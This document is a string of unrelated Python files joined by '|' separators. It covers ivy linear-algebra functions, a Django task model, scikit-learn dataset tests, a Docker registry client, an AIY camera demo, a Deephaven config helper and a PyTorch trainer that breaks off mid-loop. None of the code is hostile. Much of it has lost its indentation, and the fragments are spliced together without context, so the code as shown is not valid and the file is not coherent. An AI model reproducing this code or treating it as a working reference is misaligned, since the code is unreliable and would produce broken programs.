if test_task_id is None:
callback((False, (0, 0, PyExt.DETECT_INTERNALERR), ''))
return
PyExt.start_task(test_task_id, _test_done_cb, _test_started_cb)
|
# Choose n of the m given values so that (max - min) is minimized:
# after sorting, the best choice is some window of n consecutive values.
n, m = map(int, input().split())
l = list(map(int, input().split()))
l.sort()
mini = l[m-1] - l[0]
for i in range(m-n+1):
    mini = min(mini, l[i+n-1] - l[i])
print(mini)
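# Example (illustrative): n=3, m=5 with values [1, 9, 4, 7, 3] -> sorted
# [1, 3, 4, 7, 9]; windows of size 3 give differences 3, 4, 5, so 3 is printed.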
|
# global
from typing import Union, Optional, Tuple, Literal
from collections import namedtuple
# local
import ivy
from ivy.framework_handler import current_framework as _cur_framework
inf = float('inf')
# Array API Standard #
# -------------------#
def matrix_transpose(x: Union[ivy.Array, ivy.NativeArray])\
-> ivy.Array:
"""
Transposes a matrix (or a stack of matrices) ``x``.
Parameters
----------
x: array
input array having shape ``(..., M, N)`` and whose innermost two dimensions form ``MxN`` matrices.
Returns
-------
out: array
an array containing the transpose for each matrix and having shape ``(..., N, M)``. The returned array must have the same data type as ``x``.
"""
return _cur_framework(x).matrix_transpose(x)
# noinspection PyShadowingBuiltins
def vector_norm(x: Union[ivy.Array, ivy.NativeArray],
axis: Optional[Union[int, Tuple[int]]] = None,
keepdims: bool = False,
ord: Union[int, float, Literal[inf, -inf]] = 2)\
-> ivy.Array:
"""
Computes the vector norm of a vector (or batch of vectors) ``x``.
Parameters
----------
x:
input array. Should have a floating-point data type.
axis:
If an integer, ``axis`` specifies the axis (dimension) along which to compute vector norms. If an n-tuple, ``axis`` specifies the axes (dimensions) along which to compute batched vector norms. If ``None``, the vector norm must be computed over all array values (i.e., equivalent to computing the vector norm of a flattened array). Negative indices must be supported. Default: ``None``.
keepdims:
If ``True``, the axes (dimensions) specified by ``axis`` must be included in the result as singleton dimensions, and, accordingly, the result must be compatible with the input array (see :ref:`broadcasting`). Otherwise, if ``False``, the axes (dimensions) specified by ``axis`` must not be included in the result. Default: ``False``.
ord:
order of the norm. The following mathematical norms must be supported:
+------------------+----------------------------+
| ord | description |
+==================+============================+
| 1 | L1-norm (Manhattan) |
+------------------+----------------------------+
| 2 | L2-norm (Euclidean) |
+------------------+----------------------------+
| inf | infinity norm |
+------------------+----------------------------+
| (int,float >= 1) | p-norm |
+------------------+----------------------------+
The following non-mathematical "norms" must be supported:
+------------------+--------------------------------+
| ord | description |
+==================+================================+
| 0 | sum(a != 0) |
+------------------+--------------------------------+
| -1 | 1./sum(1./abs(a)) |
+------------------+--------------------------------+
| -2 | 1./sqrt(sum(1./abs(a)\*\*2)) |
+------------------+--------------------------------+
| -inf | min(abs(a)) |
+------------------+--------------------------------+
| (int,float < 1) | sum(abs(a)\*\*ord)\*\*(1./ord) |
+------------------+--------------------------------+
Default: ``2``.
Returns
-------
out:
an array containing the vector norms. If ``axis`` is ``None``, the returned array must be a zero-dimensional array containing a vector norm. If ``axis`` is a scalar value (``int`` or ``float``), the returned array must have a rank which is one less than the rank of ``x``. If ``axis`` is a ``n``-tuple, the returned array must have a rank which is ``n`` less than the rank of ``x``. The returned array must have a floating-point data type determined by :ref:`type-promotion`.
"""
if ord == -float('inf'):
return ivy.reduce_min(ivy.abs(x), axis, keepdims)
elif ord == float('inf'):
return ivy.reduce_max(ivy.abs(x), axis, keepdims)
elif ord == 0:
return ivy.reduce_sum(ivy.cast(x != 0, 'float32'), axis, keepdims)
    # Use the absolute value so the p-norm is correct for negative entries.
    x_raised = ivy.abs(x) ** ord
    return ivy.reduce_sum(x_raised, axis, keepdims) ** (1/ord)
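# Example (by hand): for x = [3, -4] and ord=2, the norm is
# (|3|**2 + |-4|**2) ** 0.5 = 5.0, so vector_norm(x, ord=2) should return a
# zero-dimensional array containing 5.0.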
def svd(x: Union[ivy.Array, ivy.NativeArray], full_matrices: bool = True) -> Union[ivy.Array, Tuple[ivy.Array, ...]]:
"""
Singular Value Decomposition.
When x is a 2D array, it is factorized as u @ numpy.diag(s) @ vh = (u * s) @ vh, where u and vh are 2D unitary
arrays and s is a 1D array of a’s singular values. When x is higher-dimensional, SVD is applied in batched mode.
:param x: Input array with number of dimensions >= 2.
:type x: array
:return:
u -> { (…, M, M), (…, M, K) } array \n
Unitary array(s). The first (number of dims - 2) dimensions have the same size as those of the input a.
The size of the last two dimensions depends on the value of full_matrices.
s -> (…, K) array \n
    Vector(s) with the singular values, within each vector sorted in descending order.
The first (number of dims - 2) dimensions have the same size as those of the input a.
vh -> { (…, N, N), (…, K, N) } array \n
Unitary array(s). The first (number of dims - 2) dimensions have the same size as those of the input a.
The size of the last two dimensions depends on the value of full_matrices.
"""
    return _cur_framework(x).svd(x, full_matrices)
def diagonal(x: ivy.Array,
offset: int = 0,
axis1: int = -2,
axis2: int = -1) -> ivy.Array:
"""
Returns the specified diagonals of a matrix (or a stack of matrices) ``x``.
Parameters
----------
x:
input array having shape ``(..., M, N)`` and whose innermost two dimensions form ``MxN`` matrices.
offset:
offset specifying the off-diagonal relative to the main diagonal.
- ``offset = 0``: the main diagonal.
- ``offset > 0``: off-diagonal above the main diagonal.
- ``offset < 0``: off-diagonal below the main diagonal.
Default: `0`.
    axis1:
        axis to be used as the first axis of the 2-D sub-arrays from which the diagonals should be taken.
        Default: ``-2`` (the second-to-last axis).
    axis2:
        axis to be used as the second axis of the 2-D sub-arrays from which the diagonals should be taken.
        Default: ``-1`` (the last axis).
Returns
-------
out:
an array containing the diagonals and whose shape is determined by removing the last two dimensions and appending a dimension equal to the size of the resulting diagonals. The returned array must have the same data type as ``x``.
"""
return _cur_framework(x).diagonal(x, offset, axis1=axis1, axis2=axis2)
def inv(x):
"""
Computes the (multiplicative) inverse of x matrix.
Given a square matrix x, returns the matrix x_inv satisfying dot(x, x_inv) = dot(x_inv, x) = eye(x.shape[0]).
:param x: Matrix to be inverted.
:type x: array
:return: (Multiplicative) inverse of the matrix x.
"""
return _cur_framework(x).inv(x)
def pinv(x):
"""
Computes the pseudo inverse of x matrix.
:param x: Matrix to be pseudo inverted.
:type x: array
:return: pseudo inverse of the matrix x.
"""
return _cur_framework(x).pinv(x)
def qr(x: ivy.Array,
mode: str = 'reduced') -> namedtuple('qr', ['Q', 'R']):
"""
Returns the qr decomposition x = QR of a full column rank matrix (or a stack of matrices), where Q is an orthonormal matrix (or a stack of matrices) and R is an upper-triangular matrix (or a stack of matrices).
Parameters
----------
x:
input array having shape (..., M, N) and whose innermost two dimensions form MxN matrices of rank N. Should have a floating-point data type.
mode:
decomposition mode. Should be one of the following modes:
- 'reduced': compute only the leading K columns of q, such that q and r have dimensions (..., M, K) and (..., K, N), respectively, and where K = min(M, N).
- 'complete': compute q and r with dimensions (..., M, M) and (..., M, N), respectively.
Default: 'reduced'.
Returns
-------
out:
a namedtuple (Q, R) whose
- first element must have the field name Q and must be an array whose shape depends on the value of mode and contain matrices with orthonormal columns. If mode is 'complete', the array must have shape (..., M, M). If mode is 'reduced', the array must have shape (..., M, K), where K = min(M, N). The first x.ndim-2 dimensions must have the same size as those of the input array x.
- second element must have the field name R and must be an array whose shape depends on the value of mode and contain upper-triangular matrices. If mode is 'complete', the array must have shape (..., M, N). If mode is 'reduced', the array must have shape (..., K, N), where K = min(M, N). The first x.ndim-2 dimensions must have the same size as those of the input x.
"""
return _cur_framework(x).qr(x, mode)
def matmul(x1: Union[ivy.Array, ivy.NativeArray],
x2: Union[ivy.Array, ivy.NativeArray]) -> ivy.Array:
"""
Computes the matrix product.
Parameters
----------
x1:
x1 (array) – first input array. Should have a numeric data type. Must have at least one dimension.
x2:
x2 (array) – second input array. Should have a numeric data type. Must have at least one dimension.
Returns
-------
out(array):
if both x1 and x2 are one-dimensional arrays having shape (N,), a zero-dimensional array containing the inner product as its only element.
if x1 is a two-dimensional array having shape (M, K) and x2 is a two-dimensional array having shape (K, N), a two-dimensional array containing the conventional matrix product and having shape (M, N).
if x1 is a one-dimensional array having shape (K,) and x2 is an array having shape (..., K, N), an array having shape (..., N) (i.e., prepended dimensions during vector-to-matrix promotion must be removed) and containing the conventional matrix product.
if x1 is an array having shape (..., M, K) and x2 is a one-dimensional array having shape (K,), an array having shape (..., M) (i.e., appended dimensions during vector-to-matrix promotion must be removed) and containing the conventional matrix product.
if x1 is a two-dimensional array having shape (M, K) and x2 is an array having shape (..., K, N), an array having shape (..., M, N) and containing the conventional matrix product for each stacked matrix.
if x1 is an array having shape (..., M, K) and x2 is a two-dimensional array having shape (K, N), an array having shape (..., M, N) and containing the conventional matrix product for each stacked matrix.
if either x1 or x2 has more than two dimensions, an array having a shape determined by Broadcasting shape(x1)[:-2] against shape(x2)[:-2] and containing the conventional matrix product for each stacked matrix.
Raises
------
if either x1 or x2 is a zero-dimensional array.
if x1 is a one-dimensional array having shape (K,), x2 is a one-dimensional array having shape (L,), and K != L.
if x1 is a one-dimensional array having shape (K,), x2 is an array having shape (..., L, N), and K != L.
if x1 is an array having shape (..., M, K), x2 is a one-dimensional array having shape (L,), and K != L.
if x1 is an array having shape (..., M, K), x2 is an array having shape (..., L, N), and K != L.
"""
return _cur_framework(x1).matmul(x1, x2)
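# Example (by hand): matmul([[1, 2], [3, 4]], [[5], [6]]) computes
# [[1*5 + 2*6], [3*5 + 4*6]] = [[17], [39]].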
def slodget(x: Union[ivy.Array, ivy.NativeArray],) \
-> ivy.Array:
"""
Computes the sign and natural logarithm of the determinant of an array.
Parameters
----------
x:
This is a 2D array, and it has to be square
    Returns
    -------
    out:
This function returns two values -
sign:
A number representing the sign of the determinant.
logdet:
The natural log of the absolute value of the determinant.
"""
return _cur_framework(x).slodget(x)
def svdvals(x: Union[ivy.Array, ivy.NativeArray],) \
-> ivy.Array:
"""
Returns the singular values of a matrix (or a stack of matrices) ``x``.
Parameters
----------
x:
input array having shape ``(..., M, N)`` and whose innermost two dimensions form ``MxN`` matrices.
    Returns
    -------
    out:
array with shape ``(..., K)`` that contains the vector(s) of singular values of length ``K``, where K = min(M, N).
The values are sorted in descending order by magnitude.
"""
return _cur_framework(x).svdvals(x)
def trace(x: ivy.Array,
offset: int = 0)\
-> ivy.Array:
"""
Computes the sum of the diagonal of an array.
Parameters
----------
    x:
        input array.
    offset:
        offset of the diagonal from the main diagonal. Default: ``0``.
    Returns
    -------
    out:
        the sum along the specified diagonal of ``x``.
"""
return _cur_framework(x).trace(x, offset)
# Extra #
# ------#
|
from django.contrib.postgres.fields import JSONField
from django.db import models
from surfsara.models.permission import Permission
class Task(models.Model):
RUNNING = "running"
SUCCESS = "success"
ERROR = "error"
OUTPUT_RELEASED = "output_released"
RELEASE_REJECTED = "release_rejected"
TASK_STATES = (
(RUNNING, "Running"),
(SUCCESS, "Success"),
(ERROR, "Error"),
(OUTPUT_RELEASED, "Output Released"),
(RELEASE_REJECTED, "Release Rejected"),
)
id = models.AutoField(primary_key=True)
state = models.CharField(max_length=255, choices=TASK_STATES)
progress_state = JSONField(null=True)
author_email = models.EmailField()
approver_email = models.EmailField()
algorithm = models.TextField()
algorithm_storage = models.TextField()
dataset = models.TextField()
dataset_storage = models.TextField()
output = models.TextField(null=True)
review_output = models.BooleanField(default=True)
permission = models.ForeignKey(Permission, null=True, on_delete=models.SET_NULL)
registered_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
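# Usage sketch (added for illustration; assumes migrations have been applied
# and all field values below are placeholders):
# task = Task.objects.create(
#     state=Task.RUNNING,
#     author_email='author@example.org',
#     approver_email='approver@example.org',
#     algorithm='print("hello")',
#     algorithm_storage='local',
#     dataset='data.csv',
#     dataset_storage='local',
# )
# task.state = Task.SUCCESS
# task.save()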
|
# Author: Tom Dupre la Tour
# Joan Massich <mailsik@gmail.com>
#
# License: BSD 3 clause
import numpy as np
import pytest
import scipy.sparse as sp
from numpy.testing import assert_array_equal
from sklearn.utils._seq_dataset import (
ArrayDataset32, ArrayDataset64, CSRDataset32, CSRDataset64)
from sklearn.datasets import load_iris
from sklearn.utils._testing import assert_allclose
iris = load_iris()
X64 = iris.data.astype(np.float64)
y64 = iris.target.astype(np.float64)
X_csr64 = sp.csr_matrix(X64)
sample_weight64 = np.arange(y64.size, dtype=np.float64)
X32 = iris.data.astype(np.float32)
y32 = iris.target.astype(np.float32)
X_csr32 = sp.csr_matrix(X32)
sample_weight32 = np.arange(y32.size, dtype=np.float32)
def assert_csr_equal_values(current, expected):
current.eliminate_zeros()
expected.eliminate_zeros()
expected = expected.astype(current.dtype)
assert current.shape[0] == expected.shape[0]
assert current.shape[1] == expected.shape[1]
assert_array_equal(current.data, expected.data)
assert_array_equal(current.indices, expected.indices)
assert_array_equal(current.indptr, expected.indptr)
def make_dense_dataset_32():
return ArrayDataset32(X32, y32, sample_weight32, seed=42)
def make_dense_dataset_64():
return ArrayDataset64(X64, y64, sample_weight64, seed=42)
def make_sparse_dataset_32():
return CSRDataset32(X_csr32.data, X_csr32.indptr, X_csr32.indices, y32,
sample_weight32, seed=42)
def make_sparse_dataset_64():
return CSRDataset64(X_csr64.data, X_csr64.indptr, X_csr64.indices, y64,
sample_weight64, seed=42)
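# Each factory returns a freshly constructed dataset so parametrized tests do
# not share iterator or shuffling state across runs.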
@pytest.mark.parametrize('dataset_constructor', [
make_dense_dataset_32,
make_dense_dataset_64,
make_sparse_dataset_32,
make_sparse_dataset_64,
])
def test_seq_dataset_basic_iteration(dataset_constructor):
NUMBER_OF_RUNS = 5
dataset = dataset_constructor()
for _ in range(NUMBER_OF_RUNS):
# next sample
xi_, yi, swi, idx = dataset._next_py()
xi = sp.csr_matrix((xi_), shape=(1, X64.shape[1]))
assert_csr_equal_values(xi, X_csr64[idx])
assert yi == y64[idx]
assert swi == sample_weight64[idx]
# random sample
xi_, yi, swi, idx = dataset._random_py()
xi = sp.csr_matrix((xi_), shape=(1, X64.shape[1]))
assert_csr_equal_values(xi, X_csr64[idx])
assert yi == y64[idx]
assert swi == sample_weight64[idx]
@pytest.mark.parametrize('make_dense_dataset,make_sparse_dataset', [
(make_dense_dataset_32, make_sparse_dataset_32),
(make_dense_dataset_64, make_sparse_dataset_64),
])
def test_seq_dataset_shuffle(make_dense_dataset, make_sparse_dataset):
dense_dataset, sparse_dataset = make_dense_dataset(), make_sparse_dataset()
# not shuffled
for i in range(5):
_, _, _, idx1 = dense_dataset._next_py()
_, _, _, idx2 = sparse_dataset._next_py()
assert idx1 == i
assert idx2 == i
for i in [132, 50, 9, 18, 58]:
_, _, _, idx1 = dense_dataset._random_py()
_, _, _, idx2 = sparse_dataset._random_py()
assert idx1 == i
assert idx2 == i
seed = 77
dense_dataset._shuffle_py(seed)
sparse_dataset._shuffle_py(seed)
idx_next = [63, 91, 148, 87, 29]
idx_shuffle = [137, 125, 56, 121, 127]
for i, j in zip(idx_next, idx_shuffle):
_, _, _, idx1 = dense_dataset._next_py()
_, _, _, idx2 = sparse_dataset._next_py()
assert idx1 == i
assert idx2 == i
_, _, _, idx1 = dense_dataset._random_py()
_, _, _, idx2 = sparse_dataset._random_py()
assert idx1 == j
assert idx2 == j
@pytest.mark.parametrize('make_dataset_32,make_dataset_64', [
(make_dense_dataset_32, make_dense_dataset_64),
(make_sparse_dataset_32, make_sparse_dataset_64),
])
def test_fused_types_consistency(make_dataset_32, make_dataset_64):
dataset_32, dataset_64 = make_dataset_32(), make_dataset_64()
NUMBER_OF_RUNS = 5
for _ in range(NUMBER_OF_RUNS):
# next sample
(xi_data32, _, _), yi32, _, _ = dataset_32._next_py()
(xi_data64, _, _), yi64, _, _ = dataset_64._next_py()
assert xi_data32.dtype == np.float32
assert xi_data64.dtype == np.float64
assert_allclose(xi_data64, xi_data32, rtol=1e-5)
assert_allclose(yi64, yi32, rtol=1e-5)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# bug-report: feilengcui008@gmail.com
""" api for docker registry """
import urllib2
import urllib
import json
import base64
class RegistryException(Exception):
""" registry api related exception """
pass
class RegistryApi(object):
""" interact with docker registry and harbor """
def __init__(self, username, password, registry_endpoint):
self.username = username
self.password = password
self.basic_token = base64.encodestring("%s:%s" % (str(username), str(password)))[0:-1]
self.registry_endpoint = registry_endpoint.rstrip('/')
#print("%s/v2/_catalog" % (self.registry_endpoint,))
auth = self.pingRegistry("%s/v2/_catalog" % (self.registry_endpoint,))
if auth is None:
raise RegistryException("get token realm and service failed")
self.token_endpoint = auth[0]
self.service = auth[1]
def pingRegistry(self, registry_endpoint):
""" ping v2 registry and get realm and service """
headers = dict()
try:
res = urllib2.urlopen(registry_endpoint)
except urllib2.HTTPError as e:
headers = e.hdrs.dict
try:
(realm, service, _) = headers['www-authenticate'].split(',')
return (realm[14:-1:], service[9:-1])
except Exception as e:
return None
def getBearerTokenForScope(self, scope):
""" get bearer token from harbor """
payload = urllib.urlencode({'service': self.service, 'scope': scope})
url = "%s?%s" % (self.token_endpoint, payload)
req = urllib2.Request(url)
req.add_header('Authorization', 'Basic %s' % (self.basic_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())["token"]
except Exception as e:
return None
def getRepositoryList(self, n=None):
""" get repository list """
scope = "registry:catalog:*"
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/_catalog" % (self.registry_endpoint,)
if n is not None:
url = "%s?n=%s" % (url, str(n))
req = urllib2.Request(url)
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def getTagList(self, repository):
""" get tag list for repository """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/tags/list" % (self.registry_endpoint, repository)
req = urllib2.Request(url)
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def getManifest(self, repository, reference="latest", v1=False):
""" get manifest for tag or digest """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, reference)
req = urllib2.Request(url)
req.get_method = lambda: 'GET'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
if v1:
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v1+json')
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def existManifest(self, repository, reference, v1=False):
""" check to see it manifest exist """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
raise RegistryException("manifestExist failed due to token error")
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, reference)
req = urllib2.Request(url)
req.get_method = lambda: 'HEAD'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
if v1:
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v1+json')
try:
response = urllib2.urlopen(req)
return (True, response.headers.dict["docker-content-digest"])
except Exception as e:
return (False, None)
def deleteManifest(self, repository, reference):
""" delete manifest by tag """
(is_exist, digest) = self.existManifest(repository, reference)
if not is_exist:
raise RegistryException("manifest not exist")
scope = "repository:%s:pull,push" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
raise RegistryException("delete manifest failed due to token error")
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, digest)
req = urllib2.Request(url)
req.get_method = lambda: 'DELETE'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
urllib2.urlopen(req)
except Exception as e:
return False
return True
def getManifestWithConf(self, repository, reference="latest"):
""" get manifest for tag or digest """
manifest = self.getManifest(repository, reference)
if manifest is None:
raise RegistryException("manifest for %s %s not exist" % (repository, reference))
config_digest = manifest["config"]["digest"]
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/blobs/%s" % (self.registry_endpoint, repository, config_digest)
req = urllib2.Request(url)
req.get_method = lambda: 'GET'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
try:
response = urllib2.urlopen(req)
manifest["configContent"] = json.loads(response.read())
return manifest
except Exception as e:
return None
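# Usage sketch (Python 2; endpoint and credentials below are illustrative):
# api = RegistryApi('admin', 'Harbor12345', 'http://harbor.example.com')
# print(api.getRepositoryList(n=10))
# print(api.getTagList('library/ubuntu'))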
|
#!/usr/bin/env python3
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Camera image classification demo code.
Runs continuous image classification on camera frames and prints detected object
classes.
Example:
image_classification_camera.py --num_frames 10
"""
import argparse
import contextlib
from aiy.vision.inference import CameraInference
from aiy.vision.models import image_classification
from picamera import PiCamera
def classes_info(classes):
return ', '.join('%s (%.2f)' % pair for pair in classes)
@contextlib.contextmanager
def CameraPreview(camera, enabled):
if enabled:
camera.start_preview()
try:
yield
finally:
if enabled:
camera.stop_preview()
def main():
    parser = argparse.ArgumentParser(description='Image classification camera inference example.')
parser.add_argument('--num_frames', '-n', type=int, default=None,
help='Sets the number of frames to run for, otherwise runs forever.')
    parser.add_argument('--num_objects', '-c', type=int, default=3,
        help='Sets the number of object inferences to print.')
    parser.add_argument('--nopreview', dest='preview', action='store_false', default=True,
        help='Disable camera preview.')
args = parser.parse_args()
with PiCamera(sensor_mode=4, framerate=30) as camera, \
CameraPreview(camera, enabled=args.preview), \
CameraInference(image_classification.model()) as inference:
for result in inference.run(args.num_frames):
classes = image_classification.get_classes(result, top_k=args.num_objects)
print(classes_info(classes))
if classes:
camera.annotate_text = '%s (%.2f)' % classes[0]
if __name__ == '__main__':
main()
|
#
# Copyright (c) 2016-2021 Deephaven Data Labs and Patent Pending
#
""" This module provides access to the Deephaven server configuration. """
import jpy
from deephaven import DHError
from deephaven.time import TimeZone
_JDHConfig = jpy.get_type("io.deephaven.configuration.Configuration")
_JDateTimeZone = jpy.get_type("org.joda.time.DateTimeZone")
def get_log_dir() -> str:
""" Returns the server's log directory. """
try:
return _JDHConfig.getInstance().getLogDir()
except Exception as e:
raise DHError(e, "failed to get the server's log directory.") from e
def get_server_timezone() -> TimeZone:
""" Returns the server's time zone. """
try:
j_timezone = _JDateTimeZone.forTimeZone(_JDHConfig.getInstance().getServerTimezone())
for tz in TimeZone:
if j_timezone == tz.value.getTimeZone():
return tz
        raise NotImplementedError("can't find the time zone in the TimeZone Enum.")
except Exception as e:
        raise DHError(e, message="failed to find a recognized time zone.") from e
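# Usage sketch (added for illustration; requires a running Deephaven server,
# and the printed values are illustrative):
# print(get_log_dir())          # e.g. '/var/log/deephaven'
# print(get_server_timezone())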
|
import torch
from torch import nn, optim, multiprocessing
from torch.utils.data import DataLoader
from torch.utils.tensorboard.writer import SummaryWriter
from tqdm import tqdm
from time import time
from collections import defaultdict
from utils.run_utils import get_logger
from utils.train_utils import CheckpointManager, make_k_grid, make_img_grid, make_rss_slice, standardize_image
from data.data_transforms import complex_abs
from metrics.new_1d_ssim import SSIM
from metrics.custom_losses import psnr, nmse
# Send this somewhere else soon...
def get_class_name(obj):
return 'None' if obj is None else str(obj.__class__).split("'")[1]
class ModelTrainerIMG:
"""
Model trainer for real-valued image domain losses.
    This model trainer can accept k-space and semi-k-space data, regardless of weighting.
Both complex and real-valued image domain losses can be calculated.
"""
def __init__(self, args, model, optimizer, train_loader, val_loader, input_train_transform, input_val_transform,
output_train_transform, output_val_transform, losses, scheduler=None):
# Allow multiple processes to access tensors on GPU. Add checking for multiple continuous runs.
if multiprocessing.get_start_method(allow_none=True) is None:
multiprocessing.set_start_method(method='spawn')
self.logger = get_logger(name=__name__, save_file=args.log_path / args.run_name)
# Checking whether inputs are correct.
assert isinstance(model, nn.Module), '`model` must be a Pytorch Module.'
assert isinstance(optimizer, optim.Optimizer), '`optimizer` must be a Pytorch Optimizer.'
assert isinstance(train_loader, DataLoader) and isinstance(val_loader, DataLoader), \
'`train_loader` and `val_loader` must be Pytorch DataLoader objects.'
assert callable(input_train_transform) and callable(input_val_transform), \
'input_transforms must be callable functions.'
# I think this would be best practice.
assert isinstance(output_train_transform, nn.Module) and isinstance(output_val_transform, nn.Module), \
'`output_train_transform` and `output_val_transform` must be Pytorch Modules.'
# 'losses' is expected to be a dictionary.
# Even composite losses should be a single loss module with a tuple as its output.
losses = nn.ModuleDict(losses)
if scheduler is not None:
if isinstance(scheduler, optim.lr_scheduler.ReduceLROnPlateau):
self.metric_scheduler = True
elif isinstance(scheduler, optim.lr_scheduler._LRScheduler):
self.metric_scheduler = False
else:
raise TypeError('`scheduler` must be a Pytorch Learning Rate Scheduler.')
# Display interval of 0 means no display of validation images on TensorBoard.
if args.max_images <= 0:
self.display_interval = 0
else:
self.display_interval = int(len(val_loader.dataset) // (args.max_images * args.batch_size))
self.manager = CheckpointManager(model, optimizer, mode='min', save_best_only=args.save_best_only,
ckpt_dir=args.ckpt_path, max_to_keep=args.max_to_keep)
# loading from checkpoint if specified.
if vars(args).get('prev_model_ckpt'):
self.manager.load(load_dir=args.prev_model_ckpt, load_optimizer=False)
self.model = model
self.optimizer = optimizer
self.train_loader = train_loader
self.val_loader = val_loader
self.input_train_transform = input_train_transform
self.input_val_transform = input_val_transform
self.output_train_transform = output_train_transform
self.output_val_transform = output_val_transform
self.losses = losses
self.scheduler = scheduler
self.writer = SummaryWriter(str(args.log_path))
self.verbose = args.verbose
self.num_epochs = args.num_epochs
self.smoothing_factor = args.smoothing_factor
self.shrink_scale = args.shrink_scale
self.use_slice_metrics = args.use_slice_metrics
# This part should get SSIM, not 1 - SSIM.
self.ssim = SSIM(filter_size=7).to(device=args.device) # Needed to cache the kernel.
# Logging all components of the Model Trainer.
# Train and Val input and output transforms are assumed to use the same input transform class.
self.logger.info(f'''
Summary of Model Trainer Components:
Model: {get_class_name(model)}.
Optimizer: {get_class_name(optimizer)}.
Input Transforms: {get_class_name(input_val_transform)}.
Output Transform: {get_class_name(output_val_transform)}.
Image Domain Loss: {get_class_name(losses['img_loss'])}.
Learning-Rate Scheduler: {get_class_name(scheduler)}.
        ''')  # The logged summary differs slightly between the IMG and CMG loss trainers.
def train_model(self):
tic_tic = time()
self.logger.info('Beginning Training Loop.')
for epoch in range(1, self.num_epochs + 1): # 1 based indexing of epochs.
tic = time() # Training
train_epoch_loss, train_epoch_metrics = self._train_epoch(epoch=epoch)
toc = int(time() - tic)
self._log_epoch_outputs(epoch, train_epoch_loss, train_epoch_metrics, elapsed_secs=toc, training=True)
tic = time() # Validation
val_epoch_loss, val_epoch_metrics = self._val_epoch(epoch=epoch)
toc = int(time() - tic)
self._log_epoch_outputs(epoch, val_epoch_loss, val_epoch_metrics, elapsed_secs=toc, training=False)
self.manager.save(metric=val_epoch_loss, verbose=True)
if self.scheduler is not None:
if self.metric_scheduler: # If the scheduler is a metric based scheduler, include metrics.
self.scheduler.step(metrics=val_epoch_loss)
else:
self.scheduler.step()
self.writer.close() # Flushes remaining data to TensorBoard.
toc_toc = int(time() - tic_tic)
self.logger.info(f'Finishing Training Loop. Total elapsed time: '
f'{toc_toc // 3600} hr {(toc_toc // 60) % 60} min {toc_toc % 60} sec.')
def _train_epoch(self, epoch):
self.model.train()
torch.autograd.set_grad_enabled(True)
epoch_loss = list() # Appending values to list due to numerical underflow and NaN values.
epoch_metrics = defaultdict(list)
data_loader = enumerate(self.train_loader, start=1)
if not self.verbose: # tqdm has to be on the outermost iterator to function properly.
            data_loader = tqdm(data_loader, total=len(self.train_loader))  # len(DataLoader) is the number of batches.
for step, data in data_loader:
# Data pre-processing is expected to have gradient calculations removed inside already.
inputs, targets, extra_params = self.input_train_transform(*data)
# 'recons' is a dictionary containing k-space, complex image, and real image reconstructions.
recons, step_loss, step_metrics = self._train_step(inputs, targets, extra_params)
epoch_loss.append(step_loss.detach()) # Perhaps not elegant, but underflow makes this necessary.
            # Gradients are disabled here to boost speed and avoid spurious autograd errors.
with torch.no_grad(): # Update epoch loss and metrics
if self.use_slice_metrics:
slice_metrics = self._get_slice_metrics(recons, targets, extra_params)
step_metrics.update(slice_metrics)
                for key, value in step_metrics.items():
                    epoch_metrics[key].append(value.detach())
if self.verbose:
self._log_step_outputs(epoch, step, step_loss, step_metrics, training=True)
# Converted to scalar and dict with scalar values respectively.
return self._get_epoch_outputs(epoch, epoch_loss, epoch_metrics, training=True)
def _train_step(self, inputs, targets, extra_params):
self.optimizer.zero_grad()
outputs = self.model(inputs)
recons = self.output_train_transform(outputs, targets, extra_params)
step_loss, step_metrics = self._step(recons, targets, extra_params)
step_loss.backward()
self.optimizer.step()
return recons, step_loss, step_metrics
def _val_epoch(self, epoch):
self.model.eval()
torch.autograd.set_grad_enabled(False)
epoch_loss = list()
epoch_metrics = defaultdict(list)
# 1 based indexing for steps.
data_loader = enumerate(self.val_loader, start=1)
if not self.verbose:
            data_loader = tqdm(data_loader, total=len(self.val_loader))  # Number of batches, not samples.
for step, data in data_loader:
inputs, targets, extra_params = self.input_val_transform(*data)
recons, step_loss, step_metrics = self._val_step(inputs, targets, extra_params)
epoch_loss.append(step_loss.detach())
if self.use_slice_metrics:
slice_metrics = self._get_slice_metrics(recons, targets, extra_params)
step_metrics.update(slice_metrics)
            for key, value in step_metrics.items():
                epoch_metrics[key].append(value.detach())
if self.verbose:
